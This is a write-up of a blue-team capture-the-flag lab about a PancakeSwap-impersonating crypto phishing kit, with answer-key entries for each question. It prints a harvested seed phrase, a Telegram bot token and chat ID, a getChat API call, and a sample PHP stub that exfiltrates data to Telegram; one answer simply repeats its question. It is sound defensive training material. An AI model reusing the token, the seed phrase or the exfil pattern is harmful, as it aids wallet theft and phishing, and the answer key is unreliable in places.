GrabThePhisher Write-up

Last updated 6 months ago

Praise be to Allah, and peace and blessings be upon the Messenger of Allah, his family and his companions. To proceed:

Instructions:

  • Uncompress the lab (pass: )

Scenario:

An attacker compromised a server and impersonated https://pancakeswap.finance/, a decentralized exchange native to BNB Chain, to host a phishing kit at https://apankewk.soup.xyz/mainpage.php. The attacker set it as an open directory with the file name “pankewk.zip”.

Provided the phishing kit, you, as a SOC analyst, are requested to analyze it and do your threat intel homework.

Link: https://cyberdefenders.org/blueteam-ctf-challenges/grabthephisher/

Medium: https://medium.com/@GLITCHGC/grabthephisher-write-up-b99849f18a73


Questions:

1. Which wallet is used for asking the seed phrase?

After downloading the zip file you will notice an index.html file; open it.

The answer is the first wallet shown, which matches the folder named after it in the zip file.

Answer: Metamask


2. What is the file name that has the code for the phishing kit?

Answer: What is the file name that has the code for the phishing kit?


3. In which language was the kit written?

Answer: PHP


4. What service does the kit use to retrieve the victim’s machine information?

Answer: Sypex Geo


5. How many seed phrases were already collected?

Answer: 3


6. Write down the seed phrase of the most recent phishing incident?

Answer: father also recycle embody balance concert mechanic believe owner pair muffin hockey


7. Which medium had been used for credential dumping?

Answer: Telegram


8. What is the token for the channel?

Answer: 5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10


9. What is the chat ID of the phisher’s channel?

Answer: 5442785564
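
As an added example (not the lab's files or the author's code), a small Python triage helper that does the kind of work behind questions 5 through 9: it pulls the Telegram exfil token and chat_id out of a captured kit, lists the seed phrases already harvested in the kit's log, and builds the getChat URL used to identify the channel owner. The file names, token, chat_id and phrases below are constructed stand-ins, not values from the real kit.

```python
"""Phishing-kit triage helper (added example, not the lab's or the author's code).
Scans a captured kit for its Telegram exfil channel and harvested seed phrases.
All KIT_FILES contents are constructed stand-ins, not the real kit."""
import re

# Telegram bot token shape: "<numeric bot id>:<35 chars of [A-Za-z0-9_-]>".
TOKEN_RE = re.compile(r"\b(\d{8,10}:[A-Za-z0-9_-]{35})\b")
# chat_id followed by a numeric id, however the PHP quotes or assigns it.
CHAT_ID_RE = re.compile(r"chat_id\W+(-?\d{6,})")
# Heuristic for a 12-word BIP39 mnemonic on one line (wordlist words are 3-8 letters).
SEED_RE = re.compile(r"^(?:[a-z]{3,8} ){11}[a-z]{3,8}$")

# Constructed sample: a PHP exfil stub plus the kit's harvest log.
KIT_FILES = {
    "metamask_stub.php": (
        '$token = "1234567890:AAExampleConstructedTokenValue00000";\n'
        '$url = "https://api.telegram.org/bot$token/sendMessage";\n'
        '$data = ["chat_id" => "1122334455", "text" => $msg];\n'
    ),
    "harvest.log": (
        "=== harvested wallets ===\n"
        "2024-01-01 visitor 203.0.113.5 wallet=metamask\n"
        "apple banana cherry dog elephant fish grape house igloo jelly kite lemon\n"
        "2024-01-02 visitor 203.0.113.9 wallet=metamask\n"
        "zebra yarn xray wolf violin umbrella tiger sun river queen pine ocean\n"
    ),
}

def extract_exfil_channel(files):
    """Return the first bot token and chat_id found anywhere in the kit."""
    found = {"token": None, "chat_id": None}
    for text in files.values():
        tok = TOKEN_RE.search(text)
        if tok and found["token"] is None:
            found["token"] = tok.group(1)
        cid = CHAT_ID_RE.search(text)
        if cid and found["chat_id"] is None:
            found["chat_id"] = cid.group(1)
    return found

def collected_seed_phrases(files):
    """Harvested seed phrases in log order; the last entry is the most recent."""
    return [line.strip() for text in files.values()
            for line in text.splitlines() if SEED_RE.match(line.strip())]

def getchat_url(token, chat_id):
    """Bot API getChat call that reveals the receiving chat's name and username."""
    return f"https://api.telegram.org/bot{token}/getChat?chat_id={chat_id}"
```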

Request the API to get the answers:

https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/getChat?chat_id=5442785564

10. What are the allies of the phish kit developer?

Answer: j1j1b1s@m3r0


11. What is the full name of the Phish Actor?

Answer: Marcus Aurelius


12. What is the username of the Phish Actor?

Answer: pumpkinboii


You Can Find me Here!

Blog: https://g1it0h.gitbook.io/glitch

Linkedin: https://www.linkedin.com/in/glitchgc/

Facebook: https://www.facebook.com/GLITC.GC/

Tryhackme: https://tryhackme.com/p/GLITCH1GC